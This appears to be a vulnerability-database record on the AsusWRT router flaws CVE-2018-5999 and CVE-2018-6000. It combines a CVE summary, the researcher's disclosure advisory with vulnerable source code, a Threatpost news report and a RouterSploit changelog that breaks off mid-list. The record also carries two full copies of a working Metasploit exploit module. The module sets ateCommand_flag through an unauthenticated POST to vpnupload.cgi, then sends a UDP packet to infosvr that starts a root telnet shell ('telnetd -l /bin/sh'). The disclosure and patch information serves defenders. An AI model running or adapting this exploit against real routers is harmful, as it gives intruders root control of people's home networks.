An issue was discovered in AsusWRT before 3.0.0.4.384_10007. The do_vpnupload_post function in router/httpd/web.c in vpnupload.cgi provides functionality for setting NVRAM configuration values, which allows attackers to set the admin password and launch an SSH daemon (or enable infosvr command mode), and consequently obtain remote administrative access, via a crafted request. This is available to unauthenticated attackers in conjunction with CVE-2018-5999.
{"packetstorm": [{"lastseen": "2018-02-24T00:58:03", "description": "", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "packetstorm", "title": "AsusWRT LAN Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "PACKETSTORM:146560", "href": "https://packetstormsecurity.com/files/146560/AsusWRT-LAN-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThe HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to \nperform a POST in certain cases. This can be combined with another vulnerability in \nthe VPN configuration upload routine that sets NVRAM configuration variables directly \nfrom the POST request to enable a special command mode. \nThis command mode can then be abused by sending a UDP packet to infosvr, which is running \non port UDP 9999 to directly execute commands as root. \nThis exploit leverages that to start telnetd in a random port, and then connects to it. \nIt has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], \n['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], \n['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], \n['CVE', '2018-5999'], \n['CVE', '2018-6000'] \n], \n'Targets' => \n[ \n[ 'AsusWRT < v3.0.0.4.384.10007', \n{ \n'Payload' => \n{ \n'Compat' => { \n'PayloadType' => 'cmd_interact', \n'ConnectionType' => 'find', \n}, \n}, \n} \n], \n], \n'Privileged' => true, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, \n'DisclosureDate' => 'Jan 22 2018', \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOpt::RPORT(9999) \n]) \n \nregister_advanced_options( \n[ \nOptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) \n]) \nend \n \ndef exploit \n# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD \n# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! \npost_data = Rex::MIME::Message.new \npost_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; name=\\\"ateCommand_flag\\\"\") \n \ndata = post_data.to_s \n \nres = send_request_cgi({ \n'uri' => \"/vpnupload.cgi\", \n'method' => 'POST', \n'rport' => datastore['ASUSWRTPORT'], \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \n \nif res and res.code == 200 \nprint_good(\"#{peer} - Successfully set the ateCommand_flag variable.\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\") \nend \n \n \n# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. \ninfo_pdu_size = 512 # expected packet size, not sure what the extra bytes are \nr = Random.new \n \nibox_comm_pkt_hdr_ex = \n[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC \n[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 \n[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 \nr.bytes(4) + # Info, don't know what this is \nr.bytes(6) + # MAC address \nr.bytes(32) # Password \n \ntelnet_port = rand((2**16)-1024)+1024 \ncmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*') \npkt_syscmd = \n[cmd.length,0x00].pack('C*') + # cmd length \ncmd # our command \n \npkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) \n \nconnect_udp \nudp_sock.put(pkt_final) # we could process the response, but we don't care \ndisconnect_udp \n \nprint_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\") \nsleep(10) \n \nbegin \nctx = { 'Msf' => framework, 'MsfExploit' => self } \nsock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) \nif not sock.nil? \nprint_good(\"#{peer} - Success, shell incoming!\") \nreturn handler(sock) \nend \nrescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e \nsock.close if sock \nend \n \nprint_bad(\"#{peer} - Well that didn't work... try again?\") \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146560/asuswrt_lan_rce.rb.txt"}, {"lastseen": "2018-01-26T08:23:18", "description": "", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "packetstorm", "title": "AsusWRT Router Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-26T00:00:00", "id": "PACKETSTORM:146102", "href": "https://packetstormsecurity.com/files/146102/AsusWRT-Router-Remote-Code-Execution.html", "sourceData": "`>> Unauthenticated LAN remote code execution in AsusWRT \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 22/01/2018 / Last updated: 25/01/2018 \n \n \n>> Background and summary \nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers. \nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers. \n \nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user. \n \nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory). \n \n \n>> Technical details: \n#1 \nVulnerability: HTTP server authentication bypass \nCVE-2018-5999 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions. \nIn AsusWRT_source/router/httpd/httpd.c: \n \nhandle_request(void) \n{ \n... \nhandler->auth(auth_userid, auth_passwd, auth_realm); \nauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); \n \nif (auth_result != 0) <--- auth fails \n{ \nif(strcasecmp(method, \"post\") == 0){ \nif (handler->input) { \nhandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed \n} \nsend_login_page(fromapp, auth_result, NULL, NULL, 0); \n} \n//if(!fromapp) http_logout(login_ip_tmp, cookies); \nreturn; \n} \n... \n} \n \nThis can (and will) be combined with other vulnerabilities to achieve remote code execution. \n \n \n#2 \nVulnerability: Unauthorised configuration change (NVRAM value setting) \nCVE-2018-6000 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request. \nIn AsusWRT_source/router/httpd/web.c: \n \ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary) \n{ \n... \nif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) { \nif(strstr(post_buf, \"name=\\\"file\\\"\")) \nbreak; \nelse if(strstr(post_buf, \"name=\\\"\")) { \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \np = post_buf; \nname = strstr(p, \"\\\"\") + 1; \np = strstr(name, \"\\\"\"); \nstrcpy(p++, \"\\0\"); \nvalue = strstr(p, \"\\r\\n\\r\\n\") + 4; \np = strstr(value, \"\\r\"); \nstrcpy(p, \"\\0\"); \n//printf(\"%s=%s\\n\", name, value); \nnvram_set(name, value); \n} \n} \n... \n} \n \nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker. \n \nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH. \n \nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999. \nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website). \n \nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords. \n \n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015). \n \nPacket structure (from AsusWRT_source/router/shared/iboxcom.h): \n- Header \ntypedef struct iboxPKTEx \n{ \nBYTE ServiceID; \nBYTE PacketType; \nWORD OpCode; \nDWORD Info; // Or Transaction ID \nBYTE MacAddress[6]; \nBYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string \n} ibox_comm_pkt_hdr_ex; \n \n- Body \ntypedef struct iboxPKTCmd \n{ \nWORD len; \nBYTE cmd[420]; <--- command goes here \n} PKT_SYSCMD; // total 422 bytes \n \nA Metasploit module exploiting this vulnerability has been released [3]. \n \n \n>> Fix: \nUpgrade to AsusWRT v3.0.0.4.384.10007 or above. \nSee [4] for the very few details and new firmware released by Asus. \n \n \n>> References: \n[1] https://blogs.securiteam.com/index.php/archives/3589 \n[2] https://github.com/jduck/asus-cmd \n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb \n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/ \n \n================ \nAgile Information Security Limited \nhttp://www.agileinfosec.co.uk/ \n>> Enabling secure digital business >> \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146102/asuswrt3-exec.txt"}], "zdt": [{"lastseen": "2018-03-09T16:09:48", "description": "The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode. This command mode can then be abused by sending a UDP packet to infosvr, which is running on port UDP 9999 to directly execute commands as root. This exploit leverages that to start telnetd in a random port, and then connects to it. It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "zdt", "title": "AsusWRT LAN Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "1337DAY-ID-29883", "href": "https://0day.today/exploit/description/29883", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to\r\n perform a POST in certain cases. This can be combined with another vulnerability in\r\n the VPN configuration upload routine that sets NVRAM configuration variables directly\r\n from the POST request to enable a special command mode.\r\n This command mode can then be abused by sending a UDP packet to infosvr, which is running\r\n on port UDP 9999 to directly execute commands as root.\r\n This exploit leverages that to start telnetd in a random port, and then connects to it.\r\n It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <[email\u00a0protected]>' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],\r\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],\r\n ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],\r\n ['CVE', '2018-5999'],\r\n ['CVE', '2018-6000']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'AsusWRT < v3.0.0.4.384.10007',\r\n {\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n }\r\n ],\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'DisclosureDate' => 'Jan 22 2018',\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n Opt::RPORT(9999)\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])\r\n ])\r\n end\r\n\r\n def exploit\r\n # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD\r\n # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; name=\\\"ateCommand_flag\\\"\")\r\n\r\n data = post_data.to_s\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/vpnupload.cgi\",\r\n 'method' => 'POST',\r\n 'rport' => datastore['ASUSWRTPORT'],\r\n 'data' => data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - Successfully set the ateCommand_flag variable.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\")\r\n end\r\n\r\n\r\n # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.\r\n info_pdu_size = 512 # expected packet size, not sure what the extra bytes are\r\n r = Random.new\r\n\r\n ibox_comm_pkt_hdr_ex =\r\n [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC\r\n [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15\r\n [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33\r\n r.bytes(4) + # Info, don't know what this is\r\n r.bytes(6) + # MAC address\r\n r.bytes(32) # Password\r\n\r\n telnet_port = rand((2**16)-1024)+1024\r\n cmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*')\r\n pkt_syscmd =\r\n [cmd.length,0x00].pack('C*') + # cmd length\r\n cmd # our command\r\n\r\n pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)\r\n\r\n connect_udp\r\n udp_sock.put(pkt_final) # we could process the response, but we don't care\r\n disconnect_udp\r\n\r\n print_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\")\r\n sleep(10)\r\n\r\n begin\r\n ctx = { 'Msf' => framework, 'MsfExploit' => self }\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })\r\n if not sock.nil?\r\n print_good(\"#{peer} - Success, shell incoming!\")\r\n return handler(sock)\r\n end\r\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\r\n sock.close if sock\r\n end\r\n\r\n print_bad(\"#{peer} - Well that didn't work... try again?\")\r\n end\r\nend\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/29883", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nAsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "cvss3": {}, "published": "2018-01-22T00:00:00", "type": "exploitpack", "title": "AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": "EXPLOITPACK:71928799B4AFACF08ED27F548C324480", "href": "", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n=================================================================================\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\n\n\n>> Background and summary\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\n\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\n\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\n\n\n>> Technical details:\n#1\nVulnerability: HTTP server authentication bypass\nCVE-2018-5999\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\nIn AsusWRT_source/router/httpd/httpd.c:\n\nhandle_request(void)\n{\n...\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\n\n\tif (auth_result != 0) <--- auth fails\n\t{\n\t\tif(strcasecmp(method, \"post\") == 0){\n\t\t\tif (handler->input) {\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\n\t\t\t}\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\n\t\t}\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\n\t\treturn;\n\t}\n...\n}\n\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\n\n\n#2\nVulnerability: Unauthorised configuration change (NVRAM value setting)\nCVE-2018-6000\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\nIn AsusWRT_source/router/httpd/web.c:\n\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\n{\n...\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\n\t\t\tbreak;\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\tp = post_buf;\n\t\t\tname = strstr(p, \"\\\"\") + 1;\n\t\t\tp = strstr(name, \"\\\"\");\n\t\t\tstrcpy(p++, \"\\0\");\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\n\t\t\tp = strstr(value, \"\\r\");\n\t\t\tstrcpy(p, \"\\0\");\n\t\t\t//printf(\"%s=%s\\n\", name, value);\n\t\t\tnvram_set(name, value);\n\t\t}\n\t}\n...\n}\n\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\n\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\n\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\n\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\n\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\n\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\n- Header\n typedef struct iboxPKTEx\n {\n BYTE\t\tServiceID;\n BYTE\t\tPacketType;\n WORD\t\tOpCode;\n DWORD \t\tInfo; // Or Transaction ID\n BYTE\t\tMacAddress[6];\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\n } ibox_comm_pkt_hdr_ex;\n\n- Body\n typedef struct iboxPKTCmd\n {\n WORD\t\tlen;\n BYTE\t\tcmd[420];\t\t<--- command goes here\n } PKT_SYSCMD;\t\t// total 422 bytes\n\nA Metasploit module exploiting this vulnerability has been released [3].\n\n\n>> Fix:\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\nSee [4] for the very few details and new firmware released by Asus.\n\n\n>> References:\n[1] https://blogs.securiteam.com/index.php/archives/3589\n[2] https://github.com/jduck/asus-cmd\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:27:51", "description": "ASUS released patches for over a dozen router models on Tuesday that are each vulnerable to multiple firmware flaws that when combined give a local unauthenticated attacker the ability to execute commands as root on targeted devices.\n\nRouters models patched by ASUS are RT-AC88U, RT-AC3100, RT-AC86U, RT-AC68U and RT-AC66U. The flaw is related to ASUS firmware AsusWRT (versions before 3.0.0.4.384_10007), used in select models of the company\u2019s router lines.\n\n\u201cThe attack is done from the LAN side the network, as opposed to the WAN side. In other words, as far as we know you cannot exploit this from the internet,\u201d according to network security firm Beyond Security, that disclosed the vulnerabilities [earlier this week](<https://blogs.securiteam.com/index.php/archives/3589>). \u201cThis (attack) works for someone in the your LAN \u2013 even if they are on a guest network \u2013 and it may lead to remote command execution.\u201d\n\nThe two vulnerabilities are CVE-2018-6000 and CVE-2018-5999, a configuration manipulation flaw and a server authentication bypass flaw.\n\n\u201cDue to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user,\u201d [wrote researcher Pedro Ribeiro](<https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt>) who discovered the flaw.\n\nThe first flaw (CVE-2018-5999) is tied to the ASUS router firmware and takes advantage of a weakness in the AsusWRT HTTP server and the way it handles requests via \u201chandle_request()\u201d which allows an unauthenticated user to perform a POST request for certain actions, according to Ribeiro.\n\n\u201cThis can (and will) be combined with other vulnerabilities to achieve remote code execution,\u201d he said.\n\nRibeiro describes the second bug (CVE-2018-6000 ) as an unauthorized configuration change flaw tied to the router\u2019s nonvolatile random access memory module (NVRAM).\n\n\u201cBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability (CVE-2018-5999) that allows an attacker to set NVRAM configuration values directly from the request,\u201d he said.\n\nAccording to Ribeiro\u2019s technical write up, the NVRAM values include the admin password. Therefore an attacker can manipulate, change or set NVRAM values such as the admin password to whatever they want.\n\n\u201cOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH,\u201d he said. SSH is shorthand for Secure Socket Shell, a network protocol that provides administrators (or attackers) a secure way to access a remote computer for remote management or manipulation.\n\nThe attack scenario can be varied, such as abusing ASUS\u2019 own service called \u201cinfosvr\u201d that listens on UDP broadcast port 9999 on the LAN or WLAN interface, writes Ribeiro. The infosvr services has also been a target of previous attack methods ([CVE-2014-9583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>)).\n\nThe vulnerabilities were disclosed earlier this week by network security firm Beyond Security and were part of the company\u2019s SecuriTeam Secure Disclosure program.\n\nAccording to Beyond Security, ASUS was notified of the vulnerabilities on Nov. 22. Vulnerabilities are being patched by ASUS via automatic updates sent to affected routers, according to Beyond Security.\n\nA complete list of affected routers, according to ASUS, include:\n\nRT-AC88U 3.0.0.4.384_10007\n\nRT-AC3100 3.0.0.4.384_10007\n\nRT-AC86U 3.0.0.4.384_10007\n\nRT-AC68U series 3.0.0.4.384_10007 , also include RT-AC68U/ 68R/ 68W/ AC1900/ 68U_White/ 68P/ 1900P/ 1900U\n\nRT-AC66U_B1 series 3.0.0.4.384_10007, also include AC1750_B1\n", "cvss3": {}, "published": "2018-01-25T18:40:03", "type": "threatpost", "title": "ASUS Patches Root Command Execution Flaws Haunting Over a Dozen Router Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-25T18:40:03", "id": "THREATPOST:318D2AC145FDD81AA284239AD4ADB10D", "href": "https://threatpost.com/asus-patches-root-command-execution-flaws-haunting-over-a-dozen-router-models/129666/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "pentestit": [{"lastseen": "2018-10-18T18:23:37", "description": "PenTestIT RSS Feed\n\n**RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update is out guys! This release includes some really cool features and updates such as using `pycryptodome` from `pycrypto`and newer exploitation modules! Read on for the improvements.\n\n\n\nWhat is RouterSploit?\n\n> The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aids penetration testing operations:\n> \n> * exploits \u2013 modules that take advantage of identified vulnerabilities\n> * creds \u2013 modules designed to test credentials against network services\n> * scanners \u2013 modules that check if a target is vulnerable to any exploit\n> * payloads \u2013 modules that are responsible for generating payloads for various architectures and injection points\n> * generic \u2013 modules that perform generic attacks\n\n## Official RouterSploit 3.4.0 changelog:\n\n * Fixing `setup.py` resources\n * Switching to pycroptodome\n * Fixing communication API\n * Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000)\n * Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module\n * Adding credentials used by Mirai botnet\n * Fixing 3com Officeconnect RCE module\n * Fixing `exploits/routers/billion/billion_5200w_rce.py` module\n * Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module (CVE-2017-3881)\n * Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433)\n * Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module\n * Fixing `exploits/routers/multi/tcp_32764_rce.py` module\n * Fixing `exploits/routers/ubiquiti/airos_6_x.py` module\n * Adding `OptEncoder` option\n * Fixing `use` command issue\n * Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py`\n * Adding tests for modules default values\n * Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py`\n * Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py`\n * Adding 